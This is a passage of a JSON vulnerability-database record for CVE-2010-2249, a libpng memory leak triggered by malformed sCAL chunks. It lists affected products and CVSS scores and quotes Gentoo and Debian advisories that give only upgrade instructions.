"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.6"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.0"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.6"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.9"
},
{
"_id": null,
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.2"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.0"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.44"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.2"
},
{
"_id": null,
"model": "in motion blackberry enterprise server express for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.2"
},
{
"_id": null,
"model": "linux enterprise server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.5"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.2"
},
{
"_id": null,
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.9"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "10.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "10.2"
},
{
"_id": null,
"model": "cms server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "16.1"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"_id": null,
"model": "safari beta",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4"
},
{
"_id": null,
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.7108231"
},
{
"_id": null,
"model": "linux lts lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.5"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.34"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.0.1"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"_id": null,
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "7.1"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1.3"
},
{
"_id": null,
"model": "linux enterprise desktop sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "aura system manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.2"
},
{
"_id": null,
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.4"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.17"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.3"
},
{
"_id": null,
"model": "safari beta",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0"
},
{
"_id": null,
"model": "ipad",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "0"
},
{
"_id": null,
"model": "intuity audix r5",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "0"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for domino mr1",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.2"
},
{
"_id": null,
"model": "in motion blackberry enterprise server express for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.2"
},
{
"_id": null,
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.3"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.37"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "solaris 9 sparc",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "9.2"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.3"
},
{
"_id": null,
"model": "linux mipsel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "thunderbird",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.1"
},
{
"_id": null,
"model": "player build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.2156735"
},
{
"_id": null,
"model": "hat enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "4"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.5"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11.3"
},
{
"_id": null,
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.1"
},
{
"_id": null,
"model": "enterprise linux optional productivity application server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.2"
},
{
"_id": null,
"model": "safari",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.4"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.1"
},
{
"_id": null,
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "12.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.17"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "10.0"
},
{
"_id": null,
"model": "coat systems proxyav",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "3.4.1.0"
},
{
"_id": null,
"model": "intuity audix lx r1.1",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.3"
},
{
"_id": null,
"model": "ios",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "4.2"
},
{
"_id": null,
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.580187"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"_id": null,
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0.2203138"
},
{
"_id": null,
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.7"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for exchange mr1",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.2"
},
{
"_id": null,
"model": "intuity audix lx",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.1"
},
{
"_id": null,
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1.2"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "11.0"
},
{
"_id": null,
"model": "workstation build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.4246459"
},
{
"_id": null,
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "3.1"
},
{
"_id": null,
"model": "intuity audix lx sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "messaging storage server mm3.0",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.52"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.43"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.0.1"
},
{
"_id": null,
"model": "linux enterprise desktop sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"_id": null,
"model": "ipad",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.8"
},
{
"_id": null,
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.3"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.2"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "linux -current",
"scope": null,
"trust": 0.3,
"vendor": "slackware",
"version": null
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.1"
},
{
"_id": null,
"model": "intuity lx",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.691891"
},
{
"_id": null,
"model": "hat enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "5"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.4"
},
{
"_id": null,
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.8"
},
{
"_id": null,
"model": "in motion blackberry enterprise server express for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.0"
},
{
"_id": null,
"model": "message networking",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "in motion blackberry enterprise server for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.2"
},
{
"_id": null,
"model": "linux enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "mac os server",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.11"
},
{
"_id": null,
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"_id": null,
"model": "desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.0"
},
{
"_id": null,
"model": "rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.22"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.1"
},
{
"_id": null,
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "ios beta",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.2"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"_id": null,
"model": "cms server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "16.2"
},
{
"_id": null,
"model": "workstation build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.3185404"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5"
},
{
"_id": null,
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0.1156745"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "in motion blackberry enterprise server express for domino mr1",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.16"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.53"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.13"
},
{
"_id": null,
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"_id": null,
"model": "solaris 10 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.10"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for novell groupwise mr3",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.1"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.3"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.3"
},
{
"_id": null,
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "aura conferencing standard",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2008.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.35"
},
{
"_id": null,
"model": "solaris 9 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "intuity audix lx",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "tv",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0"
},
{
"_id": null,
"model": "seamonkey",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.6"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.4"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2.2"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4"
},
{
"_id": null,
"model": "linux m68k",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.19"
}
],
"sources": [
{
"db": "BID",
"id": "41174"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-491"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001805"
},
{
"db": "NVD",
"id": "CVE-2010-2249"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:libpng:libpng",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:vmware:player",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:vmware:server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:vmware:workstation",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apple:apple_tv",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:iphone_os",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:apple:ipad",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:apple:iphone",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:apple:ipod_touch",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apple:itunes",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apple:safari",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:oracle:solaris",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:rhel_desktop_workstation",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-001805"
}
]
},
"credits": {
"_id": null,
"data": "Greg Roelofs",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201006-491"
}
],
"trust": 0.6
},
"cve": "CVE-2010-2249",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2010-2249",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2010-2249",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-44854",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2010-2249",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2010-2249",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2010-2249",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201006-491",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-44854",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2010-2249",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-44854"
},
{
"db": "VULMON",
"id": "CVE-2010-2249"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-491"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001805"
},
{
"db": "NVD",
"id": "CVE-2010-2249"
}
]
},
"description": {
"_id": null,
"data": "Memory leak in pngrutil.c in libpng before 1.2.44, and 1.4.x before 1.4.3, allows remote attackers to cause a denial of service (memory consumption and application crash) via a PNG image containing malformed Physical Scale (aka sCAL) chunks. The \u0027libpng\u0027 library is prone to multiple vulnerabilities. \nSuccessful exploits may allow remote attackers to cause denial-of-service conditions or potentially execute arbitrary code on computers running the affected library. \nThese issues affect versions prior to \u0027libpng\u0027 1.4.3 and 1.2.44. \n\nBackground\n==========\n\nlibpng is a standard library used to process PNG (Portable Network\nGraphics) images. It is used by several programs, including web\nbrowsers and potentially server processes. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 media-libs/libpng \u003c 1.4.3 \u003e= 1.4.3\n\nDescription\n===========\n\nMultiple vulnerabilities were found in libpng:\n\n* The png_decompress_chunk() function in pngrutil.c does not properly\n handle certain type of compressed data (CVE-2010-0205)\n\n* A buffer overflow in pngread.c when using progressive applications\n (CVE-2010-1205)\n\n* A memory leak in pngrutil.c when dealing with a certain type of\n chunks (CVE-2010-2249)\n\nImpact\n======\n\nAn attacker could exploit these vulnerabilities to cause programs\nlinked against the library to crash or execute arbitrary code with the\npermissions of the user running the vulnerable program, which could be\nthe root user. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libpng users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libpng-1.4.3\"\n\nReferences\n==========\n\n [ 1 ] CVE-2010-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205\n [ 2 ] CVE-2010-1205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205\n [ 3 ] CVE-2010-2249\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201010-01.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2010 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n\n. \n\nFor the testing (squeeze) and unstable (sid) distribution, these\nproblems have been fixed in version 1.2.44-1\n\nWe recommend that you upgrade your libpng package. \n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny4.dsc\n Size/MD5 checksum: 1201 518a1f5c30a115dcb732e7499a2cef96\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz\n Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny4.diff.gz\n Size/MD5 checksum: 21437 43e68a174233314cf49bb204abdd29b6\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny4_all.deb\n Size/MD5 checksum: 886 94643952b104a6f231ed7d710e2ae95d\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_alpha.deb\n Size/MD5 checksum: 182808 27b109278c41f9354d529ce0cfa2fe70\n 